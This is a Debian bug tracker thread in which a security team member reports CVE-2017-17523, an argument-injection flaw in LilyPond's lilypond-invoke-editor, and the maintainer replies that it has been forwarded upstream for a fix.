Bug#884136: lilypond: CVE-2017-17523

classic Classic list List threaded Threaded
2 messages Options
Reply | Threaded
Open this post in threaded view
|

Bug#884136: lilypond: CVE-2017-17523

Salvatore Bonaccorso-4
Source: lilypond
Version: 2.18.2-4
Severity: important
Tags: security upstream

Hi,

the following vulnerability was published for lilypond.

For a description of the issue see [1], in the "Similar
vulnerabilities in other packages" section.

CVE-2017-17523[0]:
| lilypond-invoke-editor in LilyPond 2.19.80 does not validate strings
| before launching the program specified by the BROWSER environment
| variable, which allows remote attackers to conduct argument-injection
| attacks via a crafted URL, as demonstrated by a --proxy-pac-file
| argument.

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2017-17523
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17523
[1] https://bugs.debian.org/881767

Regards,
Salvatore

Reply | Threaded
Open this post in threaded view
|

Bug#884136: lilypond: CVE-2017-17523

Don Armstrong-2
Control: forward -1 https://sourceforge.net/p/testlilyissues/issues/5243/

On Mon, 11 Dec 2017, Salvatore Bonaccorso wrote:
> If you fix the vulnerability please also make sure to include the
> CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

Thanks! This is being addressed upstream in
https://sourceforge.net/p/testlilyissues/issues/5243/; as soon as there
is a fix there with review, we'll backport it.

--
Don Armstrong                      https://www.donarmstrong.com

What prison taught me was that some people are born into a life where
they're going to be subjected to intense life experiences and personal
tragedy on an almost daily basis. [...] I don't think you get
enlightenment after something like that. I think all anyone really
wants, if they're honest with themselves, is a quiet, easy life
surrounded by people that love them. Anything else is a conceit.
 -- OP from 99chan